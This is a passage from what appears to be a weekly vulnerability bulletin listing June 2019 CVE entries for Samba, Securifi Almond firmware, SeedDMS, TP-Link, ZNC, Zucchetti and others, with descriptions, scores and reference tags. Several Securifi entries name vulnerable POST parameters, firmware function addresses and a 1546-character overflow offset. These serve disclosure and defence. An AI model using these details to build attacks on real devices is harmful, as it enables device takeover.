MISC samba — samba Samba 4.9.x before 4.9.9 and 4.10.x before 4.10.5 has a NULL pointer dereference, leading to Denial of Service. This is related to the AD DC DNS management server (dnsserver) RPC server process. 2019-06-19 4.0 CVE-2019-12435
BID
UBUNTU
CONFIRM samba — samba Samba 4.10.x before 4.10.5 has a NULL pointer dereference, leading to an AD DC LDAP server Denial of Service. This is related to an attacker using the paged search control. The attacker must have directory read access in order to attempt an exploit. 2019-06-19 4.0 CVE-2019-12436
BID
UBUNTU
CONFIRM securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of setting a name for the wireless network. These values are stored by the device in NVRAM (Non-volatile RAM). It seems that the POST parameters passed in this request to set up names on the device do not have a string length check on them. This allows an attacker to send a large payload in the “mssid_1” POST parameter. The device also allows a user to view the name of the Wifi Network set by the user. While processing this request, the device calls a function at address 0x00412CE4 (routerSummary) in the binary “webServer” located in Almond folder, which retrieves the value set earlier by “mssid_1” parameter as SSID2 and this value then results in overflowing the stack set up for this function and allows an attacker to control $ra register value on the stack which allows an attacker to control the device by executing a payload of an attacker’s choice. If the firmware version AL-R096 is dissected using binwalk tool, we obtain a cpio-root archive which contains the filesystem set up on the device that contains all the binaries. The binary “goahead” is the one that has the vulnerable function that receives the values sent by the POST request. If we open this binary in IDA-pro we will notice that this follows a MIPS little endian format. The function sub_00420F38 in IDA pro is identified to be receiving the values sent in the POST parameter “mssid_1” at address 0x0042BA00 and then sets in the NVRAM at address 0x0042C314. The value is later retrieved in the function at address 0x00412EAC and this results in overflowing the buffer as the function copies the value directly on the stack. 2019-06-18 4.6 CVE-2017-8329
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of adding new port forwarding rules to the device. It seems that the POST parameters passed in this request to set up routes on the device can be set in such a way that would result in passing commands to a “system” API in the function and thus result in command injection on the device. If the firmware version AL-R096 is dissected using binwalk tool, we obtain a cpio-root archive which contains the filesystem set up on the device that contains all the binaries. The binary “goahead” is the one that has the vulnerable function that recieves the values sent by the POST request. If we open this binary in IDA-pro we will notice that this follows a MIPS little endian format. The function sub_43C280in IDA pro is identified to be receiving the values sent in the POST request and the value set in POST parameter “ip_address” is extracted at address 0x0043C2F0. The POST parameter “ipaddress” is concatenated at address 0x0043C958 and this is passed to a “system” function at address 0x00437284. This allows an attacker to provide the payload of his/her choice and finally take control of the device. 2019-06-18 6.5 CVE-2017-8331
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of blocking key words passing in the web traffic to prevent kids from watching content that might be deemed unsafe using the web management interface. It seems that the device does not implement any cross-site scripting protection mechanism which allows an attacker to trick a user who is logged in to the web management interface into executing a stored cross-site scripting payload on the user’s browser and execute any action on the device provided by the web management interface. 2019-06-18 6.5 CVE-2017-8332
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of blocking IP addresses using the web management interface. It seems that the device does not implement any cross-site scripting forgery protection mechanism which allows an attacker to trick a user who is logged in to the web management interface into executing a cross-site scripting payload on the user’s browser and execute any action on the device provided by the web management interface. 2019-06-18 6.0 CVE-2017-8334
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of setting name for wireless network. These values are stored by the device in NVRAM (Non-volatile RAM). It seems that the POST parameters passed in this request to set up names on the device do not have a string length check on them. This allows an attacker to send a large payload in the “mssid_1” POST parameter. The device also allows a user to view the name of the Wifi Network set by the user. While processing this request, the device calls a function named “getCfgToHTML” at address 0x004268A8 which retrieves the value set earlier by “mssid_1” parameter as SSID2 and this value then results in overflowing the stack set up for this function and allows an attacker to control $ra register value on the stack which allows an attacker to control the device by executing a payload of an attacker’s choice. If the firmware version AL-R096 is dissected using binwalk tool, we obtain a cpio-root archive which contains the filesystem set up on the device that contains all the binaries. The binary “goahead” is the one that has the vulnerable function that recieves the values sent by the POST request. If we open this binary in IDA-pro we will notice that this follows a MIPS little endian format. The function sub_00420F38 in IDA pro is identified to be receiving the values sent in the POST parameter “mssid_1” at address 0x0042BA00 and then sets in the NVRAM at address 0x0042C314. The value is later retrieved in the function “getCfgToHTML” at address 0x00426924 and this results in overflowing the buffer due to “strcat” function that is utilized by this function. 2019-06-18 6.0 CVE-2017-8335
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of adding new routes to the device. It seems that the POST parameters passed in this request to set up routes on the device can be set in such a way that would result in overflowing the stack set up and allow an attacker to control the $ra register stored on the stack. If the firmware version AL-R096 is dissected using binwalk tool, we obtain a cpio-root archive which contains the filesystem set up on the device that contains all the binaries. The binary “goahead” is the one that has the vulnerable function that recieves the values sent by the POST request. If we open this binary in IDA-pro we will notice that this follows a MIPS little endian format. The function sub_00420F38 in IDA pro is identified to be receiving the values sent in the POST request. The POST parameter “gateway” allows to overflow the stack and control the $ra register after 1546 characters. The value from this post parameter is then copied on the stack at address 0x00421348 as shown below. This allows an attacker to provide the payload of his/her choice and finally take control of the device. 2019-06-18 6.5 CVE-2017-8336
MISC
MISC
BUGTRAQ securifi — almond+firmware An issue was discovered on Securifi Almond, Almond+, and Almond 2015 devices with firmware AL-R096. The device provides a user with the capability of executing various actions on the web management interface. It seems that the device does not implement any Origin header check which allows an attacker who can trick a user to navigate to an attacker’s webpage to exploit this issue and brute force the password for the web management interface. It also allows an attacker to then execute any other actions which include management if rules, sensors attached to the devices using the websocket requests. 2019-06-18 6.8 CVE-2017-8337
MISC
MISC
BUGTRAQ seeddms — seeddms SeedDMS before 5.1.11 allows Remote Command Execution (RCE) because of unvalidated file upload of PHP scripts, a different vulnerability than CVE-2018-12940. 2019-06-20 6.0 CVE-2019-12744
MISC
CONFIRM seeddms — seeddms out/out.GroupMgr.php in SeedDMS 5.1.11 has Stored XSS by making a new group with a JavaScript payload as the “GROUP” Name. 2019-06-17 4.3 CVE-2019-12801
MISC teltonika — rut950_firmware An issue was discovered on Teltonika RTU950 R_31.04.89 devices. The application allows a user to login without limitation. For every successful login request, the application saves a session. A user can re-login without logging out, causing the application to store the session in memory. Exploitation of this vulnerability will increase memory use and consume free space. 2019-06-19 6.8 CVE-2018-19878
MISC
MISC tp-link — tl-wr1043nd_firmware An issue was discovered on TP-Link TL-WR1043ND V2 devices. The credentials can be easily decoded and cracked by brute-force, WordList, or Rainbow Table attacks. Specifically, credentials in the “Authorization” cookie are encoded with URL encoding and base64, leading to easy decoding. Also, the username is cleartext, and the password is hashed with the MD5 algorithm (after decoding of the URL encoded string with base64). 2019-06-19 5.0 CVE-2019-6972
MISC
MISC tubigan — welcome_to_our_resort The Tubigan “Welcome to our Resort” 1.0 software allows CSRF via admin/mod_users/controller.php?action=edit. 2019-06-18 6.8 CVE-2018-18802
MISC
MISC twistedmatrix — twisted In words.protocols.jabber.xmlstream in Twisted through 19.2.1, XMPP support did not verify certificates when used with TLS, allowing an attacker to MITM connections. 2019-06-16 5.8 CVE-2019-12855
MISC
MISC urbackup — urbackup In UrBackup 2.2.6, an attacker can send a malformed request to the client over the network, and trigger a fileservplugin/CClientThread.cpp CClientThread::ProcessPacket metadata_id!=0 assertion, leading to shutting down the client application. 2019-06-18 5.0 CVE-2018-20013
MISC
MISC znc — znc Modules.cpp in ZNC before 1.7.4-rc1 allows remote authenticated non-admin users to escalate privileges and execute arbitrary code by loading a module with a crafted name. 2019-06-15 6.5 CVE-2019-12816
CONFIRM
CONFIRM
MLIST
BUGTRAQ zrlog — zrlog An issue was discovered in ZRLOG 2.0.1. There is a Stored XSS vulnerability in the nickname field of the comment area. 2019-06-19 4.3 CVE-2018-17079
MISC
MISC zucchetti — hr_portal Zucchetti HR Portal through 2019-03-15 allows Directory Traversal. Unauthenticated users can escape outside of the restricted location (dot-dot-slash notation) to access files or directories that are elsewhere on the system. Through this vulnerability it is possible to read the application’s java sources from /WEB-INF/classes/*.class 2019-06-19 5.0 CVE-2019-10257
MISC